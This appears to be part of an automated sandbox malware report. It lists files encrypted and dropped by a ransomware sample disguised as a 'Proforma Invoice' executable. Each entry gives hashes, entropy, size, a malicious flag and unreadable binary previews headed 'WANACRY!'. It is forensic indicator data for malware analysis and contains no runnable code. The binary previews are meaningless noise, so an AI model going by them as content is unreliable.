                                                          Preview:WANACRY!....ly..4.].\`.....]!..L..Tq....(.....!.k.o...;~.F4....A.;fp.....igCKT..9.f3..t._..J'0.b..Z.i..a.G..`....ZS.e..w.#.U@...?..6.e..B.....|[....>.W....q.....=G......`.......^3........8..lK.D8...O.h.&.B8K#^]..h.8..!..z2.vY.".].....k.5.{..."...^na"5......y......+7.......g.C.}.iN<_*QR.b^.l....p..#...#..*..D..^..=...A.s${."....*.1M .OU3..=....|d....M....c.!...L.uS....*..#...?.".^..Sw..v..z.......X.|.J.A./`,...~g`.".>.lM..".......i..n.Ld.5{......!d..x|J..........&......cn.^s3..C.(G..X'..)*)...+,.S{c&.P1.......lR.2..i..B......2fR..`..ZmZ0.Bm.....Y.L..;K..yP"..p...=c.Q.n....L.....O..........#Iw.u..<;.3.....>.>0...G6j.J."......l..W.jb.p.._....;ax./..k..#..<\4t.....:#sQ.D._I.T4....Q.vC.A.I.@....B\.;. s...x........6...O.L..Kq...?BT..O...nW.O......!..O.$h.....l<."..r.,.H...f.hS.zhJ...*.lp,..6..M...u,....."....>E|.j+...9.R..KtF'..K.o. .....U......B.....d...'...h.{lqk./...C...g..+.%..."ZN5......%. afrxu...S..rK$..H."e.C....y3..r..q{.n.0..t^._....d....
                                                          Process:C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):7944
                                                          Entropy (8bit):7.980425972677858
                                                          Encrypted:false
                                                          SSDEEP:192:lpvY3okPj5ctpuqRKoKU7R/TvEtUSQPzBXEHOrbFiyWd4CXlFo+0b6Q:lsl1ctzTdF/vBeO9WdL/Q
                                                          MD5:307589C3517C5898BA7FB2B972D4C6F6
                                                          SHA1:C600ED7136C90C60AF8566C3181174462913AFBC
                                                          SHA-256:DABA3827456A4ED3BAD2BA90649914798EF59F538F2F14C0BD6FA4DB70FDD5FD
                                                          SHA-512:187069D2E991AF765569D31DB1166B71347FD61A71917899C8B1B23C065B50E89BD9B16F3C4DBF2A868ED7A641A0A31706F2860B65E749094DE78A0C5F678815
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Preview:WANACRY!......4..<.A..u.J.>...a.ba....S...$h=..{....*.>2.M@.f.k....u.{[1..d..`xD*.:..y.....".t@..G..+D._]~.u...|...wY...OQN......U.Vu.^-h^...?.hP..<....m.....*..6NG.qB0g..\../...HO(../.<.|j..&.1.X...H.K*d....X....u?..s....L.x.......i......u...L!....Tj.............g......QQ..x.g........j..V.6..M.?......O5..5.O"C....Mi.!....,8...j...N.m...Yr.......u........o.z...#.<...........Xt....W5..g2.....:..o.q.(........7}.IQ.~x...S:.....Q....@..${..SC.y(....@/.....]..%.......w.=...A..o...3........2&...........xy..d.(...g.4.f..>_.m{L...N /...d"..\.8.`.....Q9..U6.By....UQ.=~-...C.>.b.jd.h;m#...PNhD\r..IYIg.@.Ku...Vc..H..M..ZAWE......b.[.......'..V.$...e.'.s+.[...>.v.S........](C.j..j......",j....b.+.]v.....Bq%Ea...0....}..e.X.y%Nb*D....{...>..k@...(..$.....Z|.o..vC.#.z#(.AS...K.P..'.z..f}.D.D...H1I."...~5...^..3r..."..U`..d>.?^..^.|.">.i....`..Ei.y..;V.K..;..oo.u.c..Mz.........{.Pm...0dF<.z+2K.n...u..h..A.+..i..'9.I....7.5.H2.7n.N.Tx...c.....
                                                          Process:C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):8840
                                                          Entropy (8bit):7.979257862353512
                                                          Encrypted:false
                                                          SSDEEP:192:Ox9jrPrsp8pp3Gq4euO9Ah9FB8D5AoeyiA3kLL7MTX5HFO2d:urP88b3ceuzldrLL7MTJHFO4
                                                          MD5:2D0A10256B207AB8FF9B093963AE7D2C
                                                          SHA1:FFE4FF820283ABB57664730465D61B125537122B
                                                          SHA-256:FDAA7494D775B61B1D5166D48600628151582C764E1B192E93C4501517C26C59
                                                          SHA-512:182F36BA7FC99048BBBFA6AF106C01E3A574C0C62E6FB86100EB01430EF2531B5DE22DEA9BC1453DD6BDB76703FE0CD459CA923E121AED9920E7098BF82AFEDB
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Preview:WANACRY!.....L,S......+8.(....2..'.Q9;.|.7.SCBUYs..rab;T..k....(~*...T...X.....'...KG.......!Jt1.R..2oV.@W.J..+.%....zD.{..D.....\..g.tg0..R..d%.3...KI..;........o[Fe.]1..;.....}.t......:.......Wo.{....].B.w.....8p.E.fY-T..f.V....IM"...|*CW]Cg.....h..h<.4....i!......`...-....m...7o.......A...[Bvs.n.5U@.y\.|J.U..U4p.;.sa?.,.....n.....4.^...*hU...=t......b....L.A..,.4.)b...bPom.,.0.Y-...L......e#..*yv...z.Y....x|.[.x.S.tt/....97...6....r..?./.....z.WC.X.<..y.V....\...o...{...~...;..H.!...8"R"..o..4....j....`....+.......FT.0 ..]e....k.L...>.......?^S......HC=O=|,...m4..i..#..2......!.mh.n$.i....7j.$...,c$|.3|.(....TU*...t...aP(W..q.j.i...P.].Cb..-..Y.=...],Q./C.X...Yj...E8..._}.W-......R.y8.;.VG0..E0.....O.~.E.9.G:.HFe....^.A.K..........>.;..HX........o....*..X[rD.-...P...i..q.T....x2]i...oD....x..Yk.d..L..d..}..>...A.....W)....I.B0rV.;0.S9*.q.,.O..S...d%...c.'.....3h7v...!S}.xWR.K..!.h<K-M.UW.&#....+p...H...T4....|.@..).v.........:..
                                                          Process:C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):9032
                                                          Entropy (8bit):7.980355682604797
                                                          Encrypted:false
                                                          SSDEEP:192:H1AKkhyS+1vZp4/296hkJFSka+Tx0NP+UqtNB+ewW4Dv4lkp2ruY:H+sS67dJFpKh67fw2R
                                                          MD5:24DCCB7A8DB185F27EAB67F7B0945EFA
                                                          SHA1:18A2933821A39F747C15E0B9586F5640EEF748A5
                                                          SHA-256:B535FE18F541FA5ECEBFB6321DBCFE86C257A44A72E68D1A110DC7F58351D105
                                                          SHA-512:B2E923A2FF011F0A130ED760CF2D63679D86E31E8B720AF1A99950E9EDF482997A871F48B7CE588420B88026BF28F59E5421DFD40EF288EC9AD40C8E841292F7
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Preview:WANACRY!....7......Z....o?.v.....P.I9{.M.'...T|\.a.._..t.qb.."..,*v.:..C-e.z.D....f.1..k...z.)..m...)mf.V.......$MdA.._y..........Y_.G?P.?....i......_...R..#.b.C5..b..@........C.].].>h......l.R....w?.74...1U..=.E..|..YB...4..!.4h...H04.Ri..G.O[<t...bA..J,....*".........'..c..'......a0...S....7..&"2.......L#....-c...2.>u.G.}..{.:..y.n.(#.../1......+.)x{.)..<.x.1.X.'.":.n.......,.ke...n..%...T=u.W......l.....z..h.....o."Z..T.>.U....J.B.P.!....)..P....v@)<.^9...R.K....)...<...3...a...$F.W{t*....f..+...H.2....G.......rlvo..E%..gN...xT.2R.;p..K=......~W.!...Nt..D!.-N......,t.U..........tT.DBH....(.)+{.!.$.m........9Y..t}....b.b#.q...H..<:.n..e..?y.)......w.%....)..`S.._..L..E.4A...uq.....cp=|.I~X.&.f.wy...dD~~.\..It..<.4.fkL...y.4=.B.%.......n..Z..k-...6.0.._=r"5H5..f. 7._..n ..=......|>.c*UQ..M..n........k..l..V...+.?xx..}.J...Hz...........Qt....v!*g.7.~"w.....W.........N.'........a...k...$...X`..;v.i.Y..R.2rmkk.......!..f.5.=....,=....6}.t..
                                                          Process:C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):7032
                                                          Entropy (8bit):7.972143038462305
                                                          Encrypted:false
                                                          SSDEEP:192:9WKgjVppSEkJbVhU3BQerAAVIc8TQ1AXWrOD/O:9SRp8hJ5h0MyCmaDG
                                                          MD5:E0F09906CF2A0F164B22A99C3F20F144
                                                          SHA1:ABE8BAFBCBA0D7B32ACA23FF470BBE47E7432113
                                                          SHA-256:F16AFB634198869D11E36DA9BE296C4DC2C6AAABEB9C2751BE97F2000AA4EE60
                                                          SHA-512:1BE318145B5440E8777F5D62E84AA58858B6E82935DD667C26F95445B055945B296D006E2F28DDE24BB971EF126F603085D87E7478FFFFB10D04AC1DD1C9E3F1
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Preview:WANACRY!.....=2.m<P...D.>QaP...=X. O..zA(YSh ....|K.#.(.1.4t..3.Td.O......x;....s._..._hT.Bh.....h.L..&...\C... ...5`.=C.G..}.sS.\......p?2..%u...C...i3."A......N]{r.....a.`.'.).&.p.......r..QA?...L.8..8..Lh..}$.R.6X....zhtu.6}..:`]..E.:s...I..[....k..wU'Zf..^U....T........ ......!-...-.g..Vy......J.&.^...<..,..x......#..../Y]...~.8x...=...S....e....=.))..@.:.Ag..|........p.1..:ra.^+...Dk.H...5,[s...^.$.{Q..O...b.....u.Q...2.{Q...3b.G..-v~4..N...FS.4.....mW....2.......s.S..vJ8...d.o.>..Ms.*P.OZ}...$.}.q...~e..0.v,.5...l.>~.p%....?E.A...7=3....F.1%.l6..X}k6.{./...daFA.s#s!.MT........g.`)iZ..;L...Q..4..a..+i..M.g.g..6.....k..OO....;=:p.!.\P...>d.CUH(.'...".ZU"./...C>Y@[y=;I..&.$.s..0..J.Q. ...ju.....Q....o..^...GB.q...p..... y...{.....2.O!.L....8.t......K..d.t.*....*m_g......\..[...........hu..wy(X..(.E}....i.E..%...J...x.....]}8ZRbE.1..%.z-L93.-d.<c..c}....?..,v..6....n,"..Q..f$.SeLj.r...RW...u....|.z.-0.`.GZ...i>...(.....?.,...$.-.!...J..
                                                          Process:C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):7032
                                                          Entropy (8bit):7.972143038462305
                                                          Encrypted:false
                                                          SSDEEP:192:9WKgjVppSEkJbVhU3BQerAAVIc8TQ1AXWrOD/O:9SRp8hJ5h0MyCmaDG
                                                          MD5:E0F09906CF2A0F164B22A99C3F20F144
                                                          SHA1:ABE8BAFBCBA0D7B32ACA23FF470BBE47E7432113
                                                          SHA-256:F16AFB634198869D11E36DA9BE296C4DC2C6AAABEB9C2751BE97F2000AA4EE60
                                                          SHA-512:1BE318145B5440E8777F5D62E84AA58858B6E82935DD667C26F95445B055945B296D006E2F28DDE24BB971EF126F603085D87E7478FFFFB10D04AC1DD1C9E3F1
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Preview:WANACRY!.....=2.m<P...D.>QaP...=X. O..zA(YSh ....|K.#.(.1.4t..3.Td.O......x;....s._..._hT.Bh.....h.L..&...\C... ...5`.=C.G..}.sS.\......p?2..%u...C...i3."A......N]{r.....a.`.'.).&.p.......r..QA?...L.8..8..Lh..}$.R.6X....zhtu.6}..:`]..E.:s...I..[....k..wU'Zf..^U....T........ ......!-...-.g..Vy......J.&.^...<..,..x......#..../Y]...~.8x...=...S....e....=.))..@.:.Ag..|........p.1..:ra.^+...Dk.H...5,[s...^.$.{Q..O...b.....u.Q...2.{Q...3b.G..-v~4..N...FS.4.....mW....2.......s.S..vJ8...d.o.>..Ms.*P.OZ}...$.}.q...~e..0.v,.5...l.>~.p%....?E.A...7=3....F.1%.l6..X}k6.{./...daFA.s#s!.MT........g.`)iZ..;L...Q..4..a..+i..M.g.g..6.....k..OO....;=:p.!.\P...>d.CUH(.'...".ZU"./...C>Y@[y=;I..&.$.s..0..J.Q. ...ju.....Q....o..^...GB.q...p..... y...{.....2.O!.L....8.t......K..d.t.*....*m_g......\..[...........hu..wy(X..(.E}....i.E..%...J...x.....]}8ZRbE.1..%.z-L93.-d.<c..c}....?..,v..6....n,"..Q..f$.SeLj.r...RW...u....|.z.-0.`.GZ...i>...(.....?.,...$.-.!...J..
                                                          Process:C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):1048
                                                          Entropy (8bit):7.799500606706895
                                                          Encrypted:false
                                                          SSDEEP:24:bkxiG/0TRNC0onGGfPVstLiVe9bqWbSU61rWVrDZ8falnshFjvQ:bkxbuonGGeLiKJ3w61Vualnqu
                                                          MD5:6AFDC70EF791E2079EDCB503E334727D
                                                          SHA1:CA902BD9C8885D1D2EF20D518E2991D5A068B0B0
                                                          SHA-256:C0C6430559EA1F758FC869A224E96068AF875E7C7FDACE273CC0A1595AD06675
                                                          SHA-512:4544C0D66B414C6E554F6688123D9CC1052930E5F7F5FA16BEF0B75653504160F8AB8202A9767BE7A6781CBDC8A4B165CD420CE5D0F00679D4B35FB2A1CFECE4
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Process:C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):24856
                                                          Entropy (8bit):7.991310359690565
                                                          Encrypted:true
                                                          SSDEEP:768:ZWESV8Ak8NGEYAjXZVCssHQSmZ4N3EZ9WG4DSOLRT:ZQyqGaTq3/G43LRT
                                                          MD5:AD0ABB155F19A18A3B44292925AA36DB
                                                          SHA1:706FEBF8D2DD9B8EB8D697DAEE59627EBE84B822
                                                          SHA-256:1861A8D8492668F24C914843AD82D34C711944965C3E81826297BFA9623BB8BF
                                                          SHA-512:AAEE1B18988B6B6A8C2166C31A3A06DFE4CD1DE566C57F0A0F9F37CC06CF025ECB38FE4FFE7A4F4413FF8D0220175E826085CB0425626FB9DE51CAC65EC384C4
                                                          Malicious:true
                                                          Reputation:unknown
                                                          Process:C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):24856
                                                          Entropy (8bit):7.991931964004868
                                                          Encrypted:true
                                                          SSDEEP:768:Wn9l36jGn7ViPeT5Gj6PsPCB1cfS44uPph4c:Alqjo7VtT5I6F1cfSnuPrj
                                                          MD5:B3C4DFD40C04CF2BCF2BC245D6E442D7
                                                          SHA1:3A511F9B5BC461BF63D29E031CA370CEC71FBB14
                                                          SHA-256:3ACC5B328CB7D336C0E23235AB97D20A38840D9E304EC093702734A886A9570C
                                                          SHA-512:EC0E321DD98352C28F07C3F25CF3A5DCC4E2CC229636DF2894BA485E52A96B1C10B51FD51E15B6B4DA93CC4E3A9B86F8969318FFF0F706723407481608825F07
                                                          Malicious:true
                                                          Reputation:unknown
                                                          Process:C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):24856
                                                          Entropy (8bit):7.993406946076543
                                                          Encrypted:true
                                                          SSDEEP:384:8Oh++k11Fp2JW/HcXcl2DRwnEbWKu8nl4zFyBnP4AQbDsghd1zf0VFo:8Oh++0H/HUCqEWWKu8n6BOWl3OFo
                                                          MD5:00FB43386353A61A18F150E14BE4D4DF
                                                          SHA1:0D8F7F8C453081586909DD0F608518DB5B9930BB
                                                          SHA-256:B2801214AD45FDDF0552A6DFE1B5EB6006C3A09CD061B0E7EB510CE7F7976ACD
                                                          SHA-512:5FFC2707657175D366326364C76E0808F5D4C1ED3F47B2E5442AB073D79B148BA2FB570E8398D0B32A5C609A5672ED73D455F1D15A071FC7AE638AD7D9F6BE0A
                                                          Malicious:true
                                                          Reputation:unknown
                                                          Process:C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):24856
                                                          Entropy (8bit):7.9926872744243616
                                                          Encrypted:true
                                                          SSDEEP:384:Dl4A+rNBr04MIFKZB/NpTK115BwC2PawFDG1X6t0/weejHmmY7nPP5bX/QDjYqT:DlfjDx5c12SwFM4HmrrJbPa
                                                          MD5:1A30F64FD0234F00A815C7CAB0FBB70D
                                                          SHA1:FABAF34060EB5A7F9E30FE4D8D3DEDADF0411EAC
                                                          SHA-256:4DFDC453E8711D9834AF9F7514E6396BB4A7C3A61B937C92D50CB309848AD5DE
                                                          SHA-512:E211BFF6FA1A70CC24CDAE4E8D5A052B43B64318800716D50BE500D73C2A5F07B6DA917EBF2C2991C92B7279184E61E4A6E72E1152A75DA8D33B9D6761738C78
                                                          Malicious:true
                                                          Reputation:unknown
                                                          Process:C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):4376
                                                          Entropy (8bit):7.959021503732141
                                                          Encrypted:false
                                                          SSDEEP:96:o5ANjEbFMfFyXJqV/iwoj67fHgj3J7E1ItbaZ8qiaBrCANwhFnGpwcv:OG3OqVqwoIcEOtm8qRcANwhdGpww
                                                          MD5:4429383119373101B691405E4B0A7ABD
                                                          SHA1:3B7EF97E0DD89FBB61EDC4CBC480B5BFBBEA2576
                                                          SHA-256:D000E6EE2B4BDFCD022A21CFDE35734AC53DB5DCBDBD4F27B35B9540979E0EF2
                                                          SHA-512:58145A0E432FF9D03275AB34E8394B229312BC4CD757C96E8760BDCA2D3060C43E55967DE674B02F8C8CF2E7CB2BA8C1F0A31FE5927FC720007D2E9BE5A3271C
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Process:C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):16664
                                                          Entropy (8bit):7.990963149747461
                                                          Encrypted:true
                                                          SSDEEP:384:v1wCkr8u3lV55GrWXEedf0lDaXSRlCYN4wMkLGq5PE5EeIZEl:v1w1V58mEmEjRlCCXPne5ETZe
                                                          MD5:9A302B58866140C3142FED0942209BAD
                                                          SHA1:E28DA2EC7DE6D6364346862089257B2E85D01D0A
                                                          SHA-256:11DB843CA4C67C1171AC646EB5B86C8B4B015550FAB671F784F44DCFD2E76957
                                                          SHA-512:92C650ABD132D37D4C2760D99F61582047847C90F6363A38A5CF6A6C6596F97231A241E3FB9D41430F2D94681C9C777E8EA75ECF8446CAFA95E1EB88FDFF2B79
                                                          Malicious:true
                                                          Reputation:unknown
                                                          Process:C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):16664
                                                          Entropy (8bit):7.988524921607321
                                                          Encrypted:false
                                                          SSDEEP:384:g4CEjsOxHmPxKTe3PpdqN5bmZalcAX4yrts0xGfja6IJ7kmm6i+GOmcc:gMZxHmpkefnqjCZaDDSj+mew
                                                          MD5:CC019A5D67197FF3052EDB046FE18DB9
                                                          SHA1:FFD11B5F094E3D82D29E3BECFEC069716DB7FF2E
                                                          SHA-256:A8EFB6F01C12ED4406C9D6D75282D7B4E0C43FF56ECCADE7CAB199436BF33894
                                                          SHA-512:A1A3E9394B3C5C571F6414EB02D2C7907C62AA92CEDDF5D982C8692E764C237CE8A1E94DE99C3477F1E0317F59D64FB389118B41970B6DE7CA7108C8582C78B0
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Preview:WANACRY!.....20..rqI...|..?.%N.<.IMi.(.~.Z..%.J.9...`^.l.....Q.m.n.4..'"..8.1...c..3pfB..9..=.c......S...J'...J8.p...:..SG......9P`...j.i`y.q.R0%."v.|..$6.x..n.....Yu..7c.."q..(...x..q*.z....Hv......%.t.(0....d<...$.Rd.).q$.....z......Ed#A..l..$>..Cq0.D%.....@..........v...2Z.A.,!..0./..Y.b.....R.v)ZO.......Rw^.1 ..S?.2.ia\.:...d...Vp.(T.En ....)'.3..z...+.....Y@.......~.(.K.a.....O|.+"w.iHM....I...o..p....lI_..{g.@?]...8u&...6.i... 0.W..S.X............_......O.@.Q*..a....`..(D...E.B..c.........o....S.G.l.Wo..v..y....D"<.O...X}.2.....H..6C.|4..L^oP.v....6...Zq.,%n..Y~3s.}...yi..1..r<.p....t.. .............[n<[.s........5..QMr..#..A...~.......w.<._.......?T...M..\..6.......*y/.B.d^.........ocK..m.h...A...#...S!...=...m..#......c.s...d.t.~X./4...x.]y+..nQ"P.k..i1K..C..>#k...N.v..?...SO.Op...nm!c(EU...v..m.....e......{.`.T...y.|1.K.3.X.......r6.._g....>.L}..#"..$T8[.4....._..wz5!.J.".,......-.*.p..7...aGz.m.q..~...w..*."
                                                          Process:C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):424136
                                                          Entropy (8bit):7.9994861666099
                                                          Encrypted:true
                                                          SSDEEP:6144:4w+D/GyQUpjd9LO4xfy74xhTqFES+H5LZ+rf/5GLBs3A3h/3LVtk0PsAoLOl:4w+DuzUpDVRxhgfK5LZ6n5JQRDDrPsJA
                                                          MD5:012A1054251EA72A606060498DF9EE90
                                                          SHA1:41033F05477E726CA2B2F37D53606A2744B87480
                                                          SHA-256:877590EBBB3ABF7209089C63DF5A07E7A5E93FC6F49296FF7BAE664901DBEBE8
                                                          SHA-512:F45227837860D60207C4B5C8F3E8DC2F5CBF100B71906A1E7A893B1BCF2440BCF1006DD41D4FA615670D5DB5F09F0A8CC6697E9A8D4E923281337BA251000D5E
                                                          Malicious:true
                                                          Reputation:unknown
                                                          Preview:WANACRY!....2..9..!...Lw.7.W.......IaV.5i..1{....d.XB...in.@#..........V.q..o...^..U...&..x.99 .H.......De..N.V..by.).Z..#.x~.RC...'<&.......hd.l..#8.7.R..]@.".$5]:.&.V..B.g.]....9'...S@.[..J&...}L."...Pk\{....E....s...0`.R.f]...<.n.L.....vq=..........o.F...lV.......w......l..-.\.....u.WF./.l.K....*..,.+.:..$.X.n.|..X~w]mK..O..;...~.$..Q...t.|:`q~A_.'3.L.Y%..Q^B.4x%Hh$&.#e......n.~.J.m..-V.....,.....6 h+.P7......j=...M .7.q. .J....b.fc'..y...BG{...T,...A..r.....j.t|..{9Q.G..W!..b,.c...yGCx.%7.L.\...CB.&D....V.Aw..=..4.d3.}..<-^<..x.!...=....6..U~a.t=.Y....<M..}..t...........a....D.`MBQi.2...9....m.6.[.S.'.Dq...I<...3i.k.y..X.....C..F....+.g.......y...Z..]...R_M..U...........IV.4....7.......j...4. 7i..q.y.....z.1..k.r>.)..Q.O..jp9....j..8...zj..2....03..D...Q...HB)....."eQ..z....5%U....&Ra...#!..!.2..&...."p.c?......*....:..y+.t..y.B...V.E..^....<....qV;H.....3u..).;jS.X..l.q...i...V..zO|...R.'..U..S.*N.Q.u/........5..H...14..8.qQ..-1d....g7.+..
                                                          Process:C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):102680
                                                          Entropy (8bit):7.997970711466538
                                                          Encrypted:true
                                                          SSDEEP:1536:cr6geIiHdej0wGTGDifndl4+NepEg/PEglRMnHgYajHL7HDJYRsLBGs:+7eZ60wVDwe7bE8ATajHL7HNl9
                                                          MD5:3BDA2C9AF257082FA9E0EA4B1D07A805
                                                          SHA1:813A86AD5082668027EFC7DB601C0DDAD9337401
                                                          SHA-256:5F5C9BA885FA89B55AA091AD87680F9E2872B9EDAA837E52E049C8D3D20129C1
                                                          SHA-512:B457B27F06367A80EB128A294F1D542F0911E0F29539E792BC6F0B68F9B0CA20DF4B664B16EA0D6D39A524F6E761A45011A65195F8241CC2EC90F48E7E8D5A59
                                                          Malicious:true
                                                          Reputation:unknown
                                                          Preview:WANACRY!....g~fT.......*.).Q...,F)......a....l.J..on...7}]GL...R..l1HPr.......zO....j......?.=.2.9.wM.....S...e.......m.?......[l...C.'.3. ...3..vZ...8x.....(.Cc...[.?#e...f{.......*.........$on\.@E.F.@Yb.&.nUU..>...]...e..........,.s1....C.=8e....?.qM.\j.............FN...=4_....Ka.>.^.....%......v..&U.....$..d...p*......l.........t.1`..=.....l....y1..Y7....E.j9...}m.:^.d..0.,..J.l...5..Ft.....9V..X...?..>.3^b.y..^*.!...:.Ye..R.4\.n._....k...P.1.z.5.Ir.H..g%.PLW.....J........5c[0....D..S....Q..G.8.?....e....|.:...}.H.>w..7....U.z)..7..DO..8..9\Am.A...g..w.G30O..Nh.*.....#....mc...I...{...<..0s1.]=e.....&.../..4..)U{10M2......(....;._^=...K............#..r....[...[#..8Q*y....ql...r...X........v..uvS.....C.NUw*..%$n.`.~.........x.A3iB.sz........f2.8..{+..m..rW.q8.J........'.\=.T.W:G.#.r$..}s..O!J....^4...k........$+&.w~ ..=.B......Q..,.......{......+..nv...l.....Zl.....$.n&UV-1&.1... .$K.....$.Cv....x2....;.j!d.75X.^..(.S........OUOM..w.w..P.6
                                                          Process:C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):73800
                                                          Entropy (8bit):7.997518239907743
                                                          Encrypted:true
                                                          SSDEEP:1536:HApa2ot5nEtJGDvAbt+xWeRuU6DVl5cMoEfNFQzKmp91vMEOCsIbMUubbW:HADPJSDgeGbb7eprdOqbMPvW
                                                          MD5:DFE287FDCB95F661F5060247717EF6C2
                                                          SHA1:789E75D31A7F95B3A3FD936D78836402C6C32619
                                                          SHA-256:45B4CCF622AA8CE98EDE5FDA2C77B4F7EF2618225605F2B4D7A0F9666450BAD6
                                                          SHA-512:AC70BA6623E8D91DF297C693B4E142682BB86975E8EE9A11DEE5AA73DC025E92011D14998EB3FCB5C88DE59C9F8E8C6B502BD92B16BB28BAFF0490D35C7B422B
                                                          Malicious:true
                                                          Reputation:unknown
                                                          Preview:WANACRY!.....C.!A......I.......}t...o.....2.J..eJ.2.~..y..U....|"....L.q.Az...s...L@...9|U.-.q........u..o1e...B.7.../.d.$g^LcZr.w.PtN~...$..D.%.R.B...(..D..d...`.?}w.h%V:..uBa.z...+C9F....Z...W..#.........O.#...........k(..Yq.l..X.R.Nx.K.Jc....q.eI..rz....0.......{.:._e.m#RK.K.WVqZ..(|"DW|.T.7X......z.!.<.D..'"..y...Z..p..n%+7L......Fle..."q.Db}P......Ws.P..........Ow.pG.Y=.T.v......P.f.....1}.l..^c...{....d@x..~...E.h..']..F.{(yp"G...]+.....H.cw.../.yp...... .=.j2....r.?..M...,R.,B.........`....rQ|l.X).sJ.....s.W^D...c0dt.>2..3.C.w.YzR4.f.(.n9..z.e....n..)..?..........M."..!.-_.._.p.!.9q....z..7.9)..Dp.Z......k.q..].....pb.....P.^-....0yc.F3.7.Qd..jx.Mr.....w6.9.Wk............k...M...tI.....v.8m..j.b..M....y.9......v.r+oY!...}.@..M.{W......g.ed.#w..U...p.dN.........LBt.x6 P=.i.F....5Rd&P.LPU...$f.I.L...oG.,....$S!.[.z....>.q.......AF+..}Z.....&.Y....$....._..'....'..|..<.....s.... . .|....l...>r..i%H.p9....]....*..Y].)...0.#>......E
                                                          Process:C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):102344
                                                          Entropy (8bit):7.998614698093334
                                                          Encrypted:true
                                                          SSDEEP:3072:HfotBg1eslSmCWI1JZ193aRj9+wx+Z7jpK:HAtBg4sgT1Jp09b8K
                                                          MD5:907D9836438E4F1D3509878EAEDA2E03
                                                          SHA1:853ECBDF8FBCE24FF5D92342ED05A3E31CB9E56B
                                                          SHA-256:311E9CF51544EEE0A887722FDAA87252A17F0455944D7D56331E5487D7A2E165
                                                          SHA-512:6454EDF0877BFE1334C657F226196701484736D2969D6770B004A399EAF6BE188540FAA855AF823F075ECFEFA803AA49DE5C56AF55C87BE05116F52B69C30E24
                                                          Malicious:true
                                                          Reputation:unknown
                                                          Preview:WANACRY!.....f.=....l....%..v&..i)J.o.=.|H}...1$.>R'..]2..S....zG.s^....bO......k...E_..Hr....4,.. ...x...B/<...x..Uq....}.H....G.XM~.3...J0.yWR..tg.K....E....NCV.4.......\&v.;..o.B.9$....l..iO....D.AJb.Q....r......|]..{....B..E....3.....!.}9..uQ.F.k............9.-......c.\H2{..../.F...y...9sp...X....8uy..hJ.C.1.B..<......A.h~.g.Pf.L.c`..?....H....02.....v.;.kj.N.....pN1....\.+</.?......@..4..:.....n5.....\.$....v..<_..r..i{.o...(.j......P....X{..9.9...Q(......'h3..jg.U.|=.SDW.K.w:l..(.............Q.......:.3..]lEs....7S...S...5....3.1.r`.F.B.5......z#f0I.....`.8...C.NZ,c71\..c..]...(......%...P.d?.q#..ChF..R...&.H.(...<j......)qd.f...R.%nFk....f...,`SH.Te..j.....<.g....x'....r.$0...1..tm.$.om..G(}.n$..lW.#G.T../..*.75......"..F../...(.<{p.........9.i5&.T&.......$...6rO.Pz.In..P..*..b.z..oz....]6.....Y.H.X.....H&Za.=.Ss..s.@J..a2q.Pz..H..<.Oi....?..Vd'....(-G...W.i.+s..../.M...*[.M.].(....T.C.<....T.....h....>.....d...n.Nm.....
                                                          Process:C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):312
                                                          Entropy (8bit):7.204960712313297
                                                          Encrypted:false
                                                          SSDEEP:6:bkEX5MVrD3ixqehbCOaNbMIrX9Aw06PTstrk156mwuUqsN5eyzC4+eDwCcWf:bkEX50rDSxqIb+b7An6PTR6buUZreL4N
                                                          MD5:8AB6C2CC1A13FAD74D77BB046FEC8D42
                                                          SHA1:4714FB7CBDDFB9B2A74477059A8E4051DD9C4310
                                                          SHA-256:7A1DBB9B9302DB8A37406E9A361AEABA84D576CD6647B37F6BC37F60C268703C
